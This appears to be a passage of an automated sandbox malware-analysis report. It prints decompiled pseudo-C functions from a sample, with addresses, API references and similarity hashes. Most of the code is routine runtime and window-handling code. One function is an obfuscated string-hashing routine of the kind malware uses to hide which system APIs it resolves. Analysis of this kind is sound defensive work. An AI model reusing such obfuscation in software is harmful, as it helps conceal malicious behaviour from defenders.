				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E0041E5DF(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x004313ee
0x004313f5
0x004313f9
0x00431415
0x00431436
0x0043143c
0x00431417
0x00431417
0x0043141c
0x0043141f
0x00000000
0x00431421
0x00431421
0x00431427
0x00431428
0x0043142c
0x0043142e
0x00431434
0x00000000
0x00000000
0x00431434
0x0043141f
0x0043144c

APIs

GetThreadLocale.KERNEL32 ref: 004313FB
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0043140D
GetACP.KERNEL32 ref: 00431436

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: dc1e58e87ce783da76fdcf1c714e2f89cf3d2ce207ad148ed9ce44f107e423d5
Instruction ID: df8f4565a9d497241193607ad36bdfa153b49a4b8716d654c6ad28840d039b96
Opcode Fuzzy Hash: dc1e58e87ce783da76fdcf1c714e2f89cf3d2ce207ad148ed9ce44f107e423d5
Instruction Fuzzy Hash: 5FF0FC31E002286BCB119FB5D8156EF77F4AF19B45F40516DDD41E7350E724AE0587D8

Uniqueness

Uniqueness Score: -1.00%

Function 004078B8, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004078B8(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E00407777() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E0040786C( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x446284(_a4, _a8);
			}

0x004078c5
0x004078d9
0x004078ed
0x00407905
0x004078ef
0x004078f6
0x004078f6
0x0040790d
0x00000000
0x0040790f
0x00000000
0x00407916
0x0040790d
0x00000000
0x004078db
0x00000000

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24413dd022ae49eedaea9ca8cc9c3b40e71d78154d6133483c215239823d5632
Instruction ID: 807d2f643473691e9cf4c94b7d214811ee118392236929a0e394f9924f614926
Opcode Fuzzy Hash: 24413dd022ae49eedaea9ca8cc9c3b40e71d78154d6133483c215239823d5632
Instruction Fuzzy Hash: 12F0317290810DABDF016F61CC489AE3B69BB40384B14C432FD05E61A0DB38FB61DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 02252C80, Relevance: 3.9, Strings: 3, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E02252C80(signed short* __ecx) {
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _t115;
				signed int _t117;
				signed int _t120;
				signed int _t121;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				signed short* _t140;

				_v28 = 0x6d165257;
				_v24 = 0x786b6a44;
				_v20 = 0x31acd7f1;
				_t140 = __ecx;
				asm("stosd");
				_t120 = 0x7d;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v32 = 0xfcba;
				_v32 = _v32 ^ 0xa6c2fe7d;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 / _t120;
				_v32 = _v32 << 0xd;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x54000000;
				_v36 = 0x4f36;
				_v36 = _v36 + 0xae67;
				_v36 = _v36 + 0xffffa2bb;
				_v36 = _v36 + 0xa00e;
				_t121 = 0x62;
				_v36 = _v36 / _t121;
				_v36 = _v36 + 0xffffc4b7;
				_t137 = 0x32;
				_v36 = _v36 / _t137;
				_v36 = _v36 ^ 0xc4105c7d;
				_v36 = _v36 ^ 0xc10eeb48;
				_v36 = 0x2c57;
				_v36 = _v36 >> 4;
				_v36 = _v36 >> 5;
				_v36 = _v36 | 0x3b42b64d;
				_v36 = _v36 ^ 0x3b42b64f;
				if( *((intOrPtr*)(__ecx)) != 0) {
					do {
						_t117 = _v32;
						_v36 = 0x4f36;
						_v36 = _v36 + 0xae67;
						_v36 = _v36 + 0xffffa2bb;
						_v36 = _v36 + 0xa00e;
						_v36 = _v36 / _t121;
						_v36 = _v36 + 0xffffc4b7;
						_v36 = _v36 / _t137;
						_v36 = _v36 ^ 0xc4105c7d;
						_v36 = _v36 ^ 0xc10eeb48;
						_v36 = 0x2c57;
						_v36 = _v36 >> 4;
						_v36 = _v36 >> 5;
						_v36 = _v36 | 0x3b42b64d;
						_v36 = _v36 ^ 0x3b42b64f;
						_t135 = _v32 << _v36;
						_t115 =  *_t140 & 0x0000ffff;
						_t139 = _v32 << _v36;
						if(_t115 >= 0x41 && _t115 <= 0x5a) {
							_t115 = _t115 + 0x20;
						}
						_v32 = _t115;
						_t140 =  &(_t140[1]);
						_v32 = _v32 + _t135;
						_v32 = _v32 + _t139;
						_v32 = _v32 - _t117;
						_t121 = 0x62;
						_t137 = 0x32;
					} while ( *_t140 != 0);
				}
				return _v32;
			}

0x02252c83
0x02252c8d
0x02252c97
0x02252ca6
0x02252ca8
0x02252cad
0x02252cb0
0x02252cb1
0x02252cb2
0x02252cb3
0x02252cbb
0x02252cc3
0x02252cd0
0x02252cd4
0x02252cd9
0x02252cde
0x02252ce6
0x02252cee
0x02252cf6
0x02252cfe
0x02252d0a
0x02252d0f
0x02252d15
0x02252d21
0x02252d24
0x02252d28
0x02252d30
0x02252d38
0x02252d40
0x02252d45
0x02252d4a
0x02252d52
0x02252d5d
0x02252d64
0x02252d64
0x02252d6a
0x02252d72
0x02252d7a
0x02252d82
0x02252d92
0x02252d96
0x02252da4
0x02252da8
0x02252db0
0x02252dc0
0x02252dc8
0x02252dcd
0x02252dd2
0x02252dda
0x02252de2
0x02252dec
0x02252def
0x02252df4
0x02252dfb
0x02252dfb
0x02252dfe
0x02252e02
0x02252e05
0x02252e09
0x02252e0d
0x02252e13
0x02252e16
0x02252e17
0x02252e20
0x02252e2b

Strings

W,, xrefs: 02252DC0
W,, xrefs: 02252D38
Djkx, xrefs: 02252C8D

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID: Djkx$W,$W,
API String ID: 0-3944540934
Opcode ID: ffc0239174181879fec72468d9939b9168129a79e6d9457598561d741990d87f
Instruction ID: 9e3ac68fde7f6908ee852dbead7ee3a4a43b06c971f0ff55c59bd1deafb03dc6
Opcode Fuzzy Hash: ffc0239174181879fec72468d9939b9168129a79e6d9457598561d741990d87f
Instruction Fuzzy Hash: 6C41FE726087829FE365CF29D44940BF7E1BBD4664F008E1DE4A596294D3B8DA48CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 004276D9, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004276D9(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E00424653());
				 *0x4471e8 = 0;
				return _t8;
			}

0x004276de
0x004276ee
0x004276f4
0x004276fb

APIs

__decode_pointer.LIBCMT ref: 004276E7

Part of subcall function 00424653: TlsGetValue.KERNEL32(?,004260DB,0041ED5A,00401B31,?,00401B31,00009618), ref: 00424660
Part of subcall function 00424653: TlsGetValue.KERNEL32(00000006,?,004260DB,0041ED5A,00401B31,?,00401B31,00009618), ref: 00424677

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004276EE

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: 3808dd3035dbb63b1be54f32e5543d30117604471be48c0159c63b21cb962b22
Instruction ID: b50555692b2145549f52bd469e7f170773f869d75e69dcd4c824b660d7bbf183
Opcode Fuzzy Hash: 3808dd3035dbb63b1be54f32e5543d30117604471be48c0159c63b21cb962b22
Instruction Fuzzy Hash: 42C04C5581C2914AFB019775684D3497A049B62614F9494EBA45085252DF9C52C5C16D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8F6, Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E0040B8F6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E0041F6EA(E004324BC, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E0040B2C5(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E00409C97(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E00408955(_t225 - 0x14, _t222, 7);
								_t194 = 0x444a80 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E0040819C();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E00408984(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E0040819C();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E00408984(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M0040BE0E))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E0040E644(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E0040E152(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E0040899E(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E00409CBE(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E00419E94(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E0040A420(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E0040E152(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E0040E6B6(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E00409C97(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E0040DEED(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E00409C97(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E00409C97(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E0040E644(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E0040DEED(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E0040DEED(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E00409C97(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00409C97(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E00409C97(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E00408984(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E00408984(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E00408984(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E0040B33B(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E00408984(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E0041F7C2(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x0040b8f6
0x0040b8f6
0x0040b8fd
0x0040b902
0x0040b906
0x0040b909
0x0040b910
0x0040b919
0x0040b91c
0x0040b940
0x0040b943
0x0040b96f
0x0040b972
0x0040b975
0x0040b982
0x0040b982
0x0040b987
0x0040b98a
0x0040b9a0
0x0040b9a0
0x0040b9a3
0x0040b9a5
0x0040b9f4
0x0040b9f8
0x0040ba05
0x0040ba0e
0x0040ba19
0x0040ba1f
0x0040ba21
0x0040ba24
0x0040ba54
0x0040ba54
0x0040ba57
0x0040ba5d
0x0040ba5f
0x0040baee
0x0040baee
0x0040baf1
0x00000000
0x00000000
0x0040ba67
0x0040ba6e
0x0040ba70
0x0040ba72
0x0040bab6
0x0040babb
0x0040bad9
0x0040bade
0x0040bae0
0x0040bae2
0x00000000
0x00000000
0x0040bac4
0x0040bac6
0x0040bdd7
0x0040bdda
0x0040bddf
0x0040bddf
0x0040bde2
0x0040bde2
0x0040bde3
0x0040bde6
0x0040bde8
0x0040bdea
0x0040bdea
0x00000000
0x0040bdea
0x0040bacc
0x0040bace
0x0040bad0
0x0040bad5
0x0040bad5
0x0040bad8
0x0040bad8
0x0040bae4
0x0040bae7
0x0040bae9
0x0040baeb
0x00000000
0x0040baeb
0x0040ba74
0x0040ba77
0x0040ba7a
0x0040ba7f
0x0040ba81
0x0040ba84
0x00000000
0x00000000
0x0040ba89
0x0040ba8f
0x0040ba94
0x0040ba9d
0x0040baa0
0x0040baa3
0x00000000
0x00000000
0x0040baa9
0x00000000
0x0040bb2c
0x0040bb34
0x00000000
0x00000000
0x0040bb3e
0x00000000
0x00000000
0x0040bb58
0x0040bb5a
0x0040bb5a
0x0040bb5d
0x0040bb5e
0x0040bb61
0x0040bb65
0x00000000
0x00000000
0x0040bb74
0x0040bb78
0x00000000
0x00000000
0x0040bb7f
0x0040bb35
0x0040bb35
0x0040bb37
0x00000000
0x00000000
0x0040bb82
0x0040bb8a
0x0040bb8d
0x0040bb90
0x0040bb94
0x0040bb97
0x0040bb9c
0x0040bb9e
0x0040bba2
0x0040bba6
0x0040bba9
0x0040bbae
0x0040bbb0
0x0040bbb2
0x0040bbb5
0x0040bbb7
0x0040bbbc
0x0040bbbf
0x0040bbc4
0x0040bbc6
0x0040bbc8
0x0040bbc8
0x0040bbc6
0x0040bbcb
0x0040bbcb
0x0040bbce
0x0040bbcf
0x0040bbd0
0x0040bbd3
0x0040bbd4
0x0040bbd6
0x0040bbd8
0x0040bbdc
0x0040bbe0
0x0040bbe3
0x0040bbe6
0x0040bbea
0x00000000
0x00000000
0x0040bbf1
0x0040bbf9
0x0040bbfc
0x0040bbff
0x0040bc02
0x0040bc05
0x0040bc06
0x0040bc08
0x0040bc0c
0x0040bc0e
0x0040bc0e
0x0040bc0e
0x0040bc12
0x0040bc15
0x0040bc15
0x0040bc18
0x0040bc1c
0x00000000
0x00000000
0x0040bc26
0x0040bc29
0x0040bc29
0x0040bc2c
0x0040bc2e
0x00000000
0x00000000
0x0040bc40
0x0040bc43
0x0040bc44
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc4d
0x0040bc53
0x0040bc54
0x0040bc57
0x0040bc33
0x0040bc33
0x0040bc34
0x0040bb6a
0x0040bb6a
0x0040bb6b
0x0040bb6d
0x00000000
0x00000000
0x0040bd5a
0x00000000
0x00000000
0x0040bc65
0x00000000
0x00000000
0x0040bc5c
0x0040bc5e
0x00000000
0x00000000
0x0040bc70
0x0040bc73
0x0040bc74
0x00000000
0x00000000
0x0040bc7f
0x0040bc82
0x0040bc85
0x0040bc86
0x00000000
0x00000000
0x0040bc93
0x0040bc94
0x00000000
0x00000000
0x0040bb52
0x0040bd5b
0x0040bd5b
0x00000000
0x00000000
0x0040bb43
0x0040bb45
0x00000000
0x00000000
0x0040bca4
0x0040bcab
0x0040bcac
0x0040bcae
0x0040bcb1
0x00000000
0x00000000
0x0040bcb9
0x0040bcbc
0x00000000
0x00000000
0x0040bcc3
0x0040bcc6
0x00000000
0x00000000
0x0040bccf
0x0040bcd2
0x0040bcd5
0x0040bcd6
0x0040bcd9
0x0040bcda
0x0040bcdd
0x00000000
0x00000000
0x0040bce7
0x00000000
0x00000000
0x0040bcec
0x0040bced
